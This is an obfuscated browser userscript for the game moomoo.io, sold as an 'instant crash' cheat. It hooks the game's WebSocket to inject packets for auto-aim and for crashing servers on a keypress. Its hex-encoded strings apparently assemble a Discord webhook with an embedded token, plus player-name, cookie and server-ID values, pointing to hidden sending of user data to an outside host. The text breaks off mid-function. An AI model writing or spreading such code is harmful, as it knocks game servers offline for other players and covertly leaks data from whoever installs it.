// ==UserScript==
// @name         Instant crash
// @namespace    --------
// @version      1.0
// @description  crash Key Press : Delete
// @author       Dark Dragon & A.WaSaY Offical
// @match        *://moomoo.io/*
// @match        *://dev.moomoo.io/*
// @match        *://sandbox.moomoo.io/*
// @grant        none
// @require https://greasyfork.org/scripts/368273-msgpack/code/msgpack.js?version=598723
// @require http://code.jquery.com/jquery-3.3.1.min.js
// @require https://code.jquery.com/ui/1.12.0/jquery-ui.min.js
// @require https://cdnjs.cloudflare.com/ajax/libs/jquery-confirm/3.3.0/jquery-confirm.min.js
// @downloadURL none
// ==/UserScript==chrome-extension://dhdgffkkebhmkfjojejmpbldmpobfkfo/options.html#nav=6e311917-b4a7-436a-ab79-0eaa0177834f+editor


// ==/UserScript==


var _0x3722=['\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65','\x67\x49\x54\x72\x74','\x4d\x4b\x70\x4f\x71','\x6f\x62\x6a\x65\x63\x74','\x73\x65\x61\x72\x63\x68\x50\x61\x72\x61\x6d\x73','\x37\x7c\x39\x7c\x31\x7c\x38\x7c\x35\x7c\x32\x7c\x30','\x6c\x6f\x67','\x73\x74\x72\x69\x6e\x67\x69\x66\x79','\x73\x71\x72\x74','\x34\x7c\x37\x7c\x33\x7c\x31\x7c\x38\x7c\x36\x7c\x30','\x73\x65\x73\x73\x69\x6f\x6e\x53\x74\x6f\x72\x61\x67','\x74\x71\x61\x4c\x72','\x73\x65\x6e\x64','\x61\x63\x74\x69\x6f\x6e\x42\x61\x72\x49\x74\x65\x6d','\x6f\x66\x47\x48\x6d','\x79\x53\x5a\x47\x54','\x73\x52\x65\x4a\x6d','\x6c\x65\x6e\x67\x74\x68','\x45\x47\x5a\x79\x42','\x44\x6a\x6a\x4d\x4e','\x63\x4d\x68\x4d\x4f','\x76\x49\x66\x59\x69','\x73\x6b\x74\x76\x76','\x48\x41\x4c\x51\x63','\x44\x79\x7a\x76\x51','\x69\x79\x6e\x6c\x6d','\x64\x6f\x59\x72\x4a','\x69\x7a\x44\x6f\x4a','\x64\x69\x72','\x4d\x49\x4a\x65\x48','\x73\x48\x59\x4b\x66','\x56\x49\x63\x74\x53','\x63\x7a\x45\x6a\x79','\x73\x65\x61\x72\x63\x68','\x4b\x57\x6f\x71\x53','\x72\x61\x73\x68\x20\x6d\x6f\x64','\x41\x4c\x53\x76\x70','\x77\x72\x41\x6e\x57','\x66\x61\x69\x6e\x41','\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49','\x51\x72\x52\x4f\x41','\x6c\x53\x55\x52\x42','\x7c\x35\x7c\x32\x7c\x39','\x69\x56\x71\x51\x68','\x62\x52\x58\x78\x6a','\x75\x6c\x6e\x72\x52','\x73\x70\x6c\x69\x74','\x5a\x53\x69\x58\x51','\x6c\x6f\x63\x61\x6c\x53\x74\x6f\x72\x61\x67\x65','\x68\x64\x4d\x4e\x71','\x6d\x65\x73\x73\x61\x67\x65','\x68\x61\x74','\x73\x68\x69\x66\x74','\x74\x53\x45\x72\x5a','\x65\x62\x56\x45\x73','\x56\x41\x61\x46\x63\x39\x67\x56\x37\x31\x4f\x74\x47','\x64\x79\x49\x58\x45','\x4b\x48\x6f\x77\x76','\x7a\x56\x79\x49\x75\x57\x61\x39\x79\x42\x65\x69\x6d','\x68\x72\x54\x69\x4f','\x6d\x53\x5a\x4c\x5a','\x31\x33\x63','\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a','\x63\x68\x61\x74\x62\x6f\x78','\x70\x75\x73\x68','\x46\x4b\x4b\x6a\x6f','\x6a\x73\x4a\x48\x6a','\x59\x6e\x68\x49\x6c','\x75\x45\x73\x76\x71','\x77\x54\x61\x57\x46','\x48\x74\x65\x64\x41','\x70\x61\x64\x45\x6e\x64','\x49\x52\x59\x55\x49','\x74\x56\x57\x47\x4f','\x67\x61\x6d\x65\x43\x61\x6e\x76\x61\x73','\x42\x68\x67\x6c\x42','\x44\x48\x77\x54\x66','\x66\x43\x43\x58\x79','\x4e\x48\x70\x46\x52','\x62\x42\x4a\x41\x63','\x73\x65\x72\x76\x65\x72\x20','\x72\x20\x3a\x0a','\x56\x44\x58\x62\x4c','\x62\x66\x69\x5a\x4d','\x6b\x65\x79\x75\x70','\x6f\x46\x66\x47\x4d','\x70\x72\x6f\x74\x6f\x74\x79\x70\x65','\x53\x72\x6e\x7a\x4c','\x5a\x69\x44\x6b\x77','\x56\x4f\x62\x6b\x6d','\x73\x6f\x6e','\x44\x76\x66\x6e\x77','\x50\x4f\x53\x54','\x46\x55\x48\x6f\x4a','\x72\x76\x65\x72\x20','\x43\x67\x4d\x6e\x63','\x54\x4d\x76\x58\x42','\x6a\x65\x58\x63\x6f','\x50\x43\x47\x6e\x45','\x54\x72\x69\x65\x64\x2e\x20\x2d\x20\x48\x61\x74','\x75\x74\x79\x57\x53','\x7a\x6c\x55\x50\x61','\x69\x73\x53\x6b\x75\x6c\x6c','\x76\x46\x6c\x67\x4c','\x69\x73\x4c\x65\x61\x64\x65\x72','\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61','\x6b\x56\x53\x76\x68','\x6a\x73\x42\x50\x43','\x6b\x4c\x45\x51\x48','\x6a\x6a\x50\x64\x75','\x77\x44\x53\x54\x76','\x67\x76\x6c\x6a\x72','\x6b\x4b\x78\x54\x79','\x6c\x6f\x63\x61\x74\x69\x6f\x6e','\x54\x46\x7a\x61\x68','\x6f\x66\x66\x73\x65\x74\x50\x61\x72\x65\x6e\x74','\x69\x66\x72\x61\x6d\x65','\x64\x44\x55\x64\x6f','\x7a\x4d\x4f\x59\x65','\x64\x65\x63\x6f\x64\x65','\x46\x65\x6a\x44\x70','\x76\x6a\x47\x71\x78','\x5a\x4c\x44\x47\x59','\x73\x74\x6f\x70','\x68\x72\x65\x66','\x44\x53\x43\x49\x54','\x65\x69\x63\x49\x6e','\x50\x59\x67\x6b\x74','\x61\x63\x63\x65\x73\x73\x6f\x72\x79','\x20\x4e\x6f\x72\x6d\x61\x6c\x20\x53\x65\x72\x76\x65','\x7c\x34\x7c\x33\x7c\x36','\x4b\x6b\x6d\x6b\x44','\x62\x75\x57\x59\x62','\x74\x72\x6d\x72\x6c','\x4e\x6d\x59\x43\x65','\x59\x76\x4b\x71\x75','\x70\x61\x64\x53\x74\x61\x72\x74','\x20\x63\x72\x61\x73\x68\x65\x64\x20\x74\x68\x65\x20','\x4d\x79\x69\x48\x53','\x69\x70\x41\x68\x4b','\x4c\x49\x4c\x52\x75','\x76\x51\x70\x56\x67','\x63\x6e\x70\x76\x49','\x5a\x43\x57\x67\x4f','\x45\x49\x58\x72\x41','\x6a\x4f\x74\x6d\x62','\x66\x6d\x74\x57\x68','\x54\x62\x53\x63\x52','\x67\x65\x74','\x4a\x7a\x59\x58\x47','\x72\x78\x67\x4a\x79\x2d\x42\x6b\x6c\x69\x55\x4f\x6f','\x53\x78\x4b\x72\x69','\x65\x72\x20\x3a\x0a','\x6d\x4b\x65\x6e\x49','\x69\x41\x41\x48\x64','\x44\x77\x42\x53\x6b','\x70\x6f\x77','\x50\x43\x6f\x69\x43','\x5a\x6f\x55\x54\x6c','\x6d\x70\x62\x6f\x45','\x48\x44\x4b\x70\x4c','\x46\x48\x56\x6d\x6e','\x73\x6c\x69\x63\x65','\x57\x52\x58\x54\x71','\x4e\x69\x68\x67\x74','\x6f\x6c\x64\x53\x65\x6e\x64','\x70\x50\x71\x6d\x6f','\x70\x6f\x70','\x50\x6f\x63\x5a\x78','\x73\x6f\x72\x74','\x76\x6f\x43\x72\x4d','\x70\x72\x65\x76\x65\x6e\x74\x44\x65\x66\x61\x75\x6c','\x46\x57\x6c\x45\x4d','\x67\x51\x6e\x54\x5a','\x71\x56\x48\x48\x54','\x72\x64\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x77\x65','\x69\x49\x47\x51\x65','\x54\x65\x72\x63\x62','\x72\x69\x57\x68\x4c','\x49\x63\x73\x48\x59','\x62\x6f\x64\x79','\x65\x6e\x63\x6f\x64\x65','\x42\x79\x63\x79\x64','\x59\x50\x59\x59\x6e','\x63\x6c\x61\x6e','\x4c\x51\x47\x79\x51','\x42\x42\x59\x6e\x67','\x42\x75\x78\x78\x63','\x20\x53\x61\x6e\x64\x62\x6f\x78\x20\x73\x65\x72\x76','\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64','\x63\x68\x61\x72\x41\x74','\x33\x7c\x32\x7c\x31\x7c\x34\x7c\x30','\x69\x6e\x64\x65\x78\x4f\x66','\x65\x61\x43\x41\x4b','\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74','\x7a\x6d\x71\x6b\x76','\x6c\x73\x65\x69\x79','\x53\x74\x6e\x43\x6c','\x45\x49\x50\x50\x66','\x41\x71\x57\x4a\x49','\x77\x74\x41\x48\x67','\x42\x57\x43\x75\x79','\x50\x71\x76\x47\x6b','\x78\x4f\x67\x52\x62','\x6e\x58\x42\x6b\x58','\x20\x2a\x2a\x20','\x54\x72\x69\x65\x64\x2e\x20\x2d\x20\x41\x63\x63','\x65\x48\x4b\x79\x4f','\x69\x6f\x2d\x69\x6e\x69\x74','\x5f\x70\x75\x62\x63\x69\x64\x5f\x65\x78\x70','\x45\x45\x65\x6e\x53','\x44\x48\x4c\x66\x55','\x53\x46\x53\x42\x64','\x56\x6f\x6c\x69\x6d','\x74\x79\x6d\x77\x46','\x58\x4d\x69\x59\x54','\x63\x6c\x69\x65\x6e\x74\x48\x65\x69\x67\x68\x74','\x61\x71\x68\x59\x66','\x7a\x56\x66\x74\x72','\x75\x6d\x54\x78\x53','\x4f\x50\x72\x72\x52','\x54\x42\x6e\x48\x52','\x45\x42\x51\x56\x5a','\x65\x76\x69\x68\x77','\x4f\x42\x5a\x6a\x74','\x76\x45\x56\x6f\x71','\x53\x48\x45\x79\x47','\x49\x6c\x75\x62\x52','\x5a\x6d\x6c\x53\x56','\x79\x67\x4f\x75\x6e','\x63\x6c\x61\x65\x72\x65\x64','\x6d\x6f\x75\x73\x65\x6d\x6f\x76\x65','\x71\x48\x78\x6e\x46','\x6e\x65\x72','\x55\x69\x4c\x65\x55','\x79\x43\x47\x46\x78','\x78\x71\x68\x46\x5a','\x63\x6c\x69\x65\x6e\x74\x58','\x55\x65\x69\x4f\x66','\x3a\x2f\x2f\x73\x61\x6e\x64\x62\x6f\x78\x2e\x6d\x6f','\x6f\x70\x65\x6e','\x56\x48\x54\x50\x58','\x63\x6c\x69\x65\x6e\x74\x57\x69\x64\x74\x68','\x77\x65\x70\x65\x42','\x6f\x67\x59\x46\x44','\x54\x4b\x44\x6c\x4c','\x4c\x61\x4d\x44\x53','\x75\x76\x4e\x44\x68','\x20\x5d\x20\x2a\x2a\x20','\x74\x6c\x65\x5f\x62\x51\x45\x64\x4f\x4e\x2d\x51\x75','\x65\x54\x52\x4c\x53','\x62\x68\x6f\x6f\x6b\x73\x2f\x37\x32\x38\x31\x38\x35','\x78\x73\x63\x74\x7a','\x55\x76\x6b\x51\x56','\x66\x63\x78\x42\x58','\x6e\x69\x71\x52\x71','\x4c\x4a\x7a\x65\x4b','\x64\x52\x61\x48\x62','\x4e\x55\x58\x48\x61','\x6e\x66\x4b\x54\x4b','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x64\x69\x73\x63\x6f','\x74\x62\x51\x6e\x45','\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65','\x64\x65\x72','\x74\x79\x70\x65','\x78\x49\x72\x54\x45','\x63\x45\x44\x42\x53','\x65\x6c\x73\x62\x65','\x59\x41\x66\x54\x64','\x42\x6c\x78\x46\x42','\x62\x6b\x64\x74\x70','\x57\x71\x6f\x69\x64','\x79\x42\x62\x4a\x45','\x6b\x4a\x48\x46\x64','\x66\x6c\x6f\x6f\x72','\x4c\x20\x41\x6d\x20\x4c\x65\x67\x65\x6e\x64\x20\x2e','\x6f\x6d\x6f\x6f\x2e\x69\x6f','\x66\x6f\x72\x63\x65','\x6a\x78\x63\x6a\x78','\x5a\x46\x48\x72\x61','\x4f\x6b\x5a\x4a\x51','\x64\x46\x58\x51\x4c','\x56\x71\x78\x77\x74','\x4c\x4a\x5a\x43\x70','\x64\x4c\x46\x61\x55','\x55\x4f\x56\x7a\x43','\x4b\x56\x42\x44\x55','\x6d\x6f\x6f\x5f\x6e\x61\x6d\x65','\x67\x53\x51\x42\x63','\x77\x65\x61\x70\x6f\x6e','\x72\x61\x6e\x64\x6f\x6d','\x35\x31\x33\x30\x37\x36\x35\x38\x38\x36\x31\x35\x2f','\x66\x6e\x6a\x4d\x54','\x6d\x73\x67\x70\x61\x63\x6b','\x20\x73\x74\x61\x72\x74\x65\x64\x20\x70\x6c\x61\x79','\x72\x65\x73\x69\x7a\x65','\x69\x6e\x67\x20\x61\x74\x20\x74\x68\x65\x20\x73\x65','\x49\x49\x6d\x76\x42','\x6b\x77\x55\x71\x70','\x47\x53\x50\x4c\x7a','\x78\x42\x50\x79\x76','\x66\x4a\x66\x6b\x62','\x74\x69\x6c\x48\x6f','\x5f\x5f\x70\x72\x6f\x74\x6f\x5f\x5f','\x51\x66\x4b\x4a\x65','\x73\x49\x57\x48\x66','\x4a\x4b\x78\x65\x71','\x64\x57\x65\x75\x69','\x61\x42\x62\x6a\x69','\x5a\x76\x77\x63\x62','\x62\x75\x66\x66\x65\x72','\x55\x76\x72\x51\x74','\x20\x5d\x0a\x53\x63\x72\x69\x70\x74\x20\x3a\x20\x63','\x66\x72\x6f\x6d','\x6b\x65\x79\x64\x6f\x77\x6e','\x64\x59\x72\x6f\x59','\x4d\x72\x51\x4a\x62','\x63\x6f\x6e\x74\x65\x6e\x74\x57\x69\x6e\x64\x6f\x77','\x6d\x54\x57\x4f\x69','\x4e\x51\x54\x7a\x78','\x56\x49\x4f\x66\x66','\x49\x4e\x65\x55\x65','\x20\x77\x69\x74\x68\x20\x74\x68\x65\x20\x69\x64\x20','\x48\x55\x72\x62\x46','\x41\x54\x4d\x64\x42','\x6a\x68\x61\x56\x66','\x59\x5a\x5a\x65\x4a','\x20\x52\x75\x6e\x20\x46\x6f\x72\x20\x4e\x6f\x20\x44','\x54\x45\x76\x50\x75','\x64\x61\x74\x61','\x4f\x77\x6f\x41\x65','\x6b\x74\x4b\x6b\x44','\x45\x50\x45\x63\x43','\x4d\x75\x73\x4b\x78','\x69\x43\x63\x70\x79','\x65\x69\x64','\x66\x74\x6e\x49\x52','\x41\x59\x52\x63\x78','\x47\x51\x64\x59\x77','\x61\x63\x74\x69\x76\x65\x45\x6c\x65\x6d\x65\x6e\x74','\x7a\x73\x4b\x74\x6d','\x5a\x5a\x4c\x62\x44','\x4d\x65\x74\x6a\x6d','\x4e\x5a\x58\x4f\x55','\x75\x77\x6d\x49\x4a','\x65\x78\x34','\x41\x4d\x4b\x62\x56','\x5a\x54\x42\x76\x59','\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69\x73\x74\x65','\x6a\x4b\x4f\x74\x4a','\x61\x74\x61\x6e\x32','\x6b\x6c\x47\x41\x4d','\x74\x6f\x53\x74\x72\x69\x6e\x67','\x53\x43\x78\x79\x77','\x43\x4b\x70\x43\x53','\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6e\x74','\x6b\x65\x79\x43\x6f\x64\x65','\x4d\x4b\x70\x51\x50','\x73\x75\x6b\x6c\x56','\x52\x57\x70\x71\x61','\x49\x6c\x62\x74\x6f','\x5f\x70\x75\x62\x63\x69\x64','\x69\x6c\x79\x4b\x59','\x74\x56\x59\x66\x4c','\x67\x74\x5a\x63\x49','\x76\x61\x41\x59\x6d\x39\x4f\x5a\x74\x66\x30\x47\x4a','\x73\x74\x61\x72\x74'];(function(_0xe3048e,_0x372260){var _0x35d306=function(_0x5cfce5){while(--_0x5cfce5){_0xe3048e['push'](_0xe3048e['shift']());}};_0x35d306(++_0x372260);}(_0x3722,0x9f));var _0x35d3=function(_0xe3048e,_0x372260){_0xe3048e=_0xe3048e-0x0;var _0x35d306=_0x3722[_0xe3048e];return _0x35d306;};let mouseX;let mouseY;let width;let height;setInterval(()=>{var _0x14b834={'\x6f\x66\x47\x48\x6d':function(_0x2c4b42,_0x549bd1){return _0x2c4b42==_0x549bd1;},'\x74\x53\x45\x72\x5a':function(_0x24685,_0x14995d){return _0x24685(_0x14995d);},'\x5a\x6d\x6c\x53\x56':function(_0x5f0e82,_0xa4f73c){return _0x5f0e82(_0xa4f73c);},'\x56\x4f\x62\x6b\x6d':function(_0x54cd49,_0x341aeb,_0x2d6e41){return _0x54cd49(_0x341aeb,_0x2d6e41);},'\x73\x46\x75\x63\x71':function(_0x171337,_0x4e999b){return _0x171337(_0x4e999b);},'\x51\x66\x4b\x4a\x65':'\x74\x65\x73\x74\x69\x6e\x67'};if(_0x14b834[_0x35d3('\x30\x78\x64\x65')](clanToggle,0x1)){_0x14b834[_0x35d3('\x30\x78\x31\x30\x35')](doNewSend,['\x39',[null]]);_0x14b834[_0x35d3('\x30\x78\x34\x35')](doNewSend,['\x38',[_0x14b834[_0x35d3('\x30\x78\x31\x32\x39')](animate,![],0x5)]]);}_0x14b834['\x73\x46\x75\x63\x71'](doNewSend,[_0x14b834[_0x35d3('\x30\x78\x39\x31')],[0x6]]);},0xc8);setInterval(()=>{var _0x2ed1b3={'\x65\x43\x44\x79\x5a':function(_0x2a2985,_0x3af162){return _0x2a2985==_0x3af162;}};if(_0x2ed1b3['\x65\x43\x44\x79\x5a'](autoaim,!![])){doNewSend(['\x32',[nearestEnemyAngle]]);}},0x0);setInterval(()=>{var _0x397c42={'\x52\x6b\x70\x53\x45':function(_0x2b6c3c){return _0x2b6c3c();},'\x5a\x4b\x59\x55\x6d':function(_0x417328,_0x5d1fd5){return _0x417328(_0x5d1fd5);},'\x64\x52\x61\x48\x62':function(_0x90dc54,_0x170507){return _0x90dc54(_0x170507);},'\x6b\x4c\x45\x51\x48':function(_0x55ad20,_0x3c48f3,_0x8dc941){return _0x55ad20(_0x3c48f3,_0x8dc941);},'\x7a\x6c\x55\x50\x61':function(_0x2b3972,_0x3638f8){return _0x2b3972(_0x3638f8);},'\x4e\x6d\x59\x43\x65':function(_0x1cb2fe,_0x58d82a){return _0x1cb2fe==_0x58d82a;},'\x54\x46\x7a\x61\x68':_0x35d3('\x30\x78\x63\x33'),'\x6d\x53\x5a\x4c\x5a':function(_0x38cc9f,_0x56aea2){return _0x38cc9f!=_0x56aea2;},'\x5a\x5a\x4c\x62\x44':function(_0x5d8e07,_0x4c2942){return _0x5d8e07===_0x4c2942;},'\x4f\x41\x74\x6f\x6e':_0x35d3('\x30\x78\x63\x36'),'\x56\x49\x4f\x66\x66':_0x35d3('\x30\x78\x31\x33\x33'),'\x49\x49\x6d\x76\x42':'\x6b\x61\x42\x6b\x4b','\x66\x43\x43\x58\x79':_0x35d3('\x30\x78\x38\x63'),'\x76\x6b\x6c\x46\x73':function(_0x5671b0,_0x51488e){return _0x5671b0(_0x51488e);}};if(_0x397c42[_0x35d3('\x30\x78\x31\x35\x36')](hatToggle,0x1)){if(_0x397c42[_0x35d3('\x30\x78\x31\x34\x32')]===_0x397c42[_0x35d3('\x30\x78\x31\x34\x32')]){if(_0x397c42[_0x35d3('\x30\x78\x31\x30\x63')](oldHat,normalHat)){if(_0x397c42[_0x35d3('\x30\x78\x62\x36')](_0x397c42['\x4f\x41\x74\x6f\x6e'],_0x397c42['\x4f\x41\x74\x6f\x6e'])){_0x397c42[_0x35d3('\x30\x78\x31\x33\x35')](hat,normalHat);console['\x6c\x6f\x67'](_0x397c42[_0x35d3('\x30\x78\x61\x31')]);}else{_0x397c42['\x5a\x4b\x59\x55\x6d'](acc,0xd);_0x397c42[_0x35d3('\x30\x78\x36\x32')](clearTimeout,police1);police2=_0x397c42[_0x35d3('\x30\x78\x31\x33\x63')](setTimeout,function(){_0x397c42['\x52\x6b\x70\x53\x45'](h2);},0x0);}}if(oldAcc!=normalAcc){if(_0x397c42[_0x35d3('\x30\x78\x38\x61')]===_0x397c42[_0x35d3('\x30\x78\x31\x31\x64')]){_0x397c42[_0x35d3('\x30\x78\x31\x33\x35')](doNewSend,['\x32',[nearestEnemyAngle]]);}else{_0x397c42['\x76\x6b\x6c\x46\x73'](acc,normalAcc);console[_0x35d3('\x30\x78\x64\x36')](_0x35d3('\x30\x78\x32\x66'));}}oldHat=normalHat;oldAcc=normalAcc;}else{doNewSend(['\x35',[id,null]]);_0x397c42[_0x35d3('\x30\x78\x31\x33\x35')](doNewSend,['\x63',[0x1,angle]]);doNewSend(['\x63',[0x0,angle]]);_0x397c42[_0x35d3('\x30\x78\x31\x33\x35')](doNewSend,['\x35',[myPlayer[_0x35d3('\x30\x78\x38\x32')],!![]]]);}}},0x19);function normal(){hat(normalHat);acc(normalAcc);}function aim(_0x38867c,_0x2bcf75){var _0x4fa30b={'\x59\x50\x59\x59\x6e':_0x35d3('\x30\x78\x31\x31\x61'),'\x73\x6b\x74\x76\x76':_0x35d3('\x30\x78\x34\x38')};var _0x422168=document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x4fa30b[_0x35d3('\x30\x78\x31\x38')]);_0x422168[_0x35d3('\x30\x78\x63\x34')](new MouseEvent(_0x4fa30b[_0x35d3('\x30\x78\x65\x36')],{'\x63\x6c\x69\x65\x6e\x74\x58':_0x38867c,'\x63\x6c\x69\x65\x6e\x74\x59':_0x2bcf75}));}let coreURL=new URL(window[_0x35d3('\x30\x78\x31\x34\x31')][_0x35d3('\x30\x78\x31\x34\x63')]);window[_0x35d3('\x30\x78\x64\x61')+'\x65'][_0x35d3('\x30\x78\x37\x36')]=coreURL[_0x35d3('\x30\x78\x64\x34')][_0x35d3('\x30\x78\x31\x36\x34')]('\x66\x63');var lasthat=0x6;var instahat=0x0;var nearestEnemy;var nearestEnemyAngle;var nearestTribeAngle;var isEnemyNear;var instaSpeed=0xe6;var primary;var secondary;var foodType;var wallType;var spikeType;var millType;var mineType;var boostType;var turretType;var spawnpadType;var autoaim=![];var tick=0x1;var oldHat;var oldAcc;var enemiesNear;var normalHat;var normalAcc;var ws;var msgpack5=msgpack;var boostDir;let myPlayer={'\x69\x64':null,'\x78':null,'\x79':null,'\x64\x69\x72':null,'\x6f\x62\x6a\x65\x63\x74':null,'\x77\x65\x61\x70\x6f\x6e':null,'\x63\x6c\x61\x6e':null,'\x69\x73\x4c\x65\x61\x64\x65\x72':null,'\x68\x61\x74':null,'\x61\x63\x63\x65\x73\x73\x6f\x72\x79':null,'\x69\x73\x53\x6b\x75\x6c\x6c':null};let healSpeed=0x82;var messageToggle=0x0;var clanToggle=0x0;let healToggle=0x1;let hatToggle=0x1;var tribeMembersNear;var isTribeMemberNear;var nearestTribeMember;document[_0x35d3('\x30\x78\x38\x36')]=msgpack;function n(){this[_0x35d3('\x30\x78\x39\x37')]=new Uint8Array([0x0]);this[_0x35d3('\x30\x78\x39\x37')][_0x35d3('\x30\x78\x39\x30')]=new Uint8Array();this[_0x35d3('\x30\x78\x36\x39')]=0x0;}WebSocket[_0x35d3('\x30\x78\x31\x32\x36')][_0x35d3('\x30\x78\x36')]=WebSocket[_0x35d3('\x30\x78\x31\x32\x36')]['\x73\x65\x6e\x64'];WebSocket['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65'][_0x35d3('\x30\x78\x64\x63')]=function(_0x27677d){var _0x3b13e6={'\x47\x41\x63\x4d\x75':function(_0x2935fc,_0x3a7c48){return _0x2935fc===_0x3a7c48;},'\x77\x65\x70\x65\x42':'\x7a\x6d\x71\x6b\x76'};if(!ws){if(_0x3b13e6['\x47\x41\x63\x4d\x75'](_0x35d3('\x30\x78\x32\x34'),_0x3b13e6[_0x35d3('\x30\x78\x35\x34')])){document['\x77\x73']=this;ws=this;socketFound(this);}else{secondary=i;}}this[_0x35d3('\x30\x78\x36')](_0x27677d);};function socketFound(_0x20bd55){var _0x22fee3={'\x76\x6f\x43\x72\x4d':function(_0x234c7d,_0x1024a5,_0x415ea9){return _0x234c7d(_0x1024a5,_0x415ea9);},'\x42\x42\x72\x46\x6d':function(_0x1e1f91,_0xc6be1f){return _0x1e1f91(_0xc6be1f);},'\x44\x48\x4c\x66\x55':function(_0x59aa95,_0x3f2a61){return _0x59aa95(_0x3f2a61);},'\x44\x48\x77\x54\x66':function(_0x3dc32f,_0x11ca33){return _0x3dc32f===_0x11ca33;},'\x70\x57\x56\x5a\x58':_0x35d3('\x30\x78\x62\x62'),'\x64\x4c\x46\x61\x55':function(_0x505e78,_0x4bf0fd){return _0x505e78(_0x4bf0fd);},'\x42\x68\x67\x6c\x42':_0x35d3('\x30\x78\x31\x30\x32')};_0x20bd55['\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69\x73\x74\x65'+_0x35d3('\x30\x78\x34\x61')](_0x22fee3[_0x35d3('\x30\x78\x31\x31\x62')],function(_0x290190){var _0x510eaa={'\x77\x54\x61\x57\x46':function(_0x2ce8dd){return _0x2ce8dd();},'\x74\x56\x57\x47\x4f':function(_0x40995b,_0x366d7f,_0x39a500){return _0x22fee3[_0x35d3('\x30\x78\x62')](_0x40995b,_0x366d7f,_0x39a500);},'\x45\x49\x50\x50\x66':function(_0x8f91ae,_0x4d8412){return _0x22fee3['\x42\x42\x72\x46\x6d'](_0x8f91ae,_0x4d8412);},'\x69\x65\x58\x67\x6c':function(_0x5498de,_0x2dd2d1){return _0x22fee3[_0x35d3('\x30\x78\x33\x34')](_0x5498de,_0x2dd2d1);}};if(_0x22fee3[_0x35d3('\x30\x78\x31\x31\x63')](_0x22fee3['\x70\x57\x56\x5a\x58'],_0x22fee3['\x70\x57\x56\x5a\x58'])){_0x22fee3[_0x35d3('\x30\x78\x37\x64')](handleMessage,_0x290190);}else{e[_0x35d3('\x30\x78\x63')+'\x74']();if(policeMod){police1=_0x510eaa[_0x35d3('\x30\x78\x31\x31\x39')](setTimeout,function(){_0x510eaa[_0x35d3('\x30\x78\x31\x31\x35')](h1);},0x0);}else{_0x510eaa[_0x35d3('\x30\x78\x32\x37')](clearTimeout,police1);_0x510eaa['\x69\x65\x58\x67\x6c'](clearTimeout,police2);}policeMod=!policeMod;}});}function handleMessage(_0x16b1b1){var _0x12b840={'\x69\x70\x41\x68\x4b':function(_0x45077e,_0x538f5c){return _0x45077e(_0x538f5c);},'\x4d\x4b\x70\x4f\x71':_0x35d3('\x30\x78\x31\x30\x64'),'\x75\x76\x4e\x44\x68':function(_0x34dd13,_0x5ca700){return _0x34dd13+_0x5ca700;},'\x49\x4e\x65\x55\x65':function(_0x2c3f38,_0x5c63ae){return _0x2c3f38*_0x5c63ae;},'\x53\x46\x53\x42\x64':function(_0x35bd94,_0x79738d){return _0x35bd94==_0x79738d;},'\x6d\x65\x6e\x4f\x75':_0x35d3('\x30\x78\x64\x39')+_0x35d3('\x30\x78\x66\x61'),'\x73\x49\x57\x48\x66':function(_0x4828ed,_0x2e0dab){return _0x4828ed!=_0x2e0dab;},'\x4c\x61\x4d\x44\x53':function(_0x1a7842,_0x37db90){return _0x1a7842===_0x37db90;},'\x4a\x7a\x59\x58\x47':function(_0x182f0d,_0x3c5c02){return _0x182f0d==_0x3c5c02;},'\x54\x62\x53\x63\x52':function(_0x2c4d67,_0x28cd00){return _0x2c4d67-_0x28cd00;},'\x42\x42\x59\x6e\x67':_0x35d3('\x30\x78\x31\x34\x34'),'\x5a\x53\x69\x58\x51':_0x35d3('\x30\x78\x36\x35')+_0x35d3('\x30\x78\x31\x30')+_0x35d3('\x30\x78\x35\x63')+_0x35d3('\x30\x78\x38\x34')+'\x7a\x56\x79\x49\x75\x57\x61\x39\x79\x42\x65\x69\x6d'+'\x56\x41\x61\x46\x63\x39\x67\x56\x37\x31\x4f\x74\x47'+_0x35d3('\x30\x78\x31\x36\x36')+_0x35d3('\x30\x78\x35\x61')+_0x35d3('\x30\x78\x63\x65')+_0x35d3('\x30\x78\x62\x61'),'\x6e\x69\x71\x52\x71':_0x35d3('\x30\x78\x31\x32\x63'),'\x51\x62\x58\x75\x45':_0x35d3('\x30\x78\x64\x30'),'\x44\x6a\x6a\x4d\x4e':function(_0x2f2aa9,_0x28275f){return _0x2f2aa9<_0x28275f;},'\x49\x6c\x62\x74\x6f':function(_0x58c98b,_0x55312e){return _0x58c98b!==_0x55312e;},'\x66\x74\x6e\x49\x52':function(_0x65a779,_0x76f514){return _0x65a779<_0x76f514;},'\x78\x49\x72\x54\x45':function(_0x439a1f,_0x2d1aad){return _0x439a1f*_0x2d1aad;},'\x69\x7a\x44\x6f\x4a':function(_0x37b51d,_0x2ac8ff){return _0x37b51d(_0x2ac8ff);},'\x74\x62\x51\x6e\x45':function(_0x4142c0){return _0x4142c0();},'\x69\x75\x69\x71\x78':_0x35d3('\x30\x78\x31\x31\x61'),'\x77\x72\x41\x6e\x57':_0x35d3('\x30\x78\x34\x38'),'\x62\x75\x57\x59\x62':function(_0x15e875,_0x24ef64){return _0x15e875(_0x24ef64);},'\x69\x6b\x73\x6d\x42':_0x35d3('\x30\x78\x31\x30\x32'),'\x75\x45\x73\x76\x71':function(_0x5bd3e0,_0x29a5d2){return _0x5bd3e0>_0x29a5d2;},'\x4b\x48\x6f\x77\x76':function(_0x4e42d1,_0x447a87){return _0x4e42d1===_0x447a87;},'\x56\x71\x78\x77\x74':_0x35d3('\x30\x78\x31\x34\x61'),'\x44\x53\x43\x49\x54':function(_0x2c2ed7,_0x174541){return _0x2c2ed7 instanceof _0x174541;},'\x6f\x46\x66\x47\x4d':function(_0x5a20ba,_0x149ebe){return 